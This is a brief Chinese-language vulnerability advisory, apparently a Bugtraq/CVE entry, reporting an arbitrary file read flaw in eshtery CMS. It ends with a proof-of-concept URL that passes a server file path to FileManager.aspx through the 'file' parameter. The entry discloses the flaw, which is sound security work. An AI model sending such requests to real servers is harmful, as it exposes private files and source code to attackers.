Bugtraq ID:65740
CVE ID:CVE-2014-2069
eshtery CMS是一款内容管理系统。
eshtery CMS不正确过滤用户的输入,允许远程攻击者利用漏洞提交请求读取系统任意文件内容。
0
eshtery CMS
目前没有详细解决方案提供:
http://www.example.com/[path]/FileManager.aspx?file=E:\web\admin.asp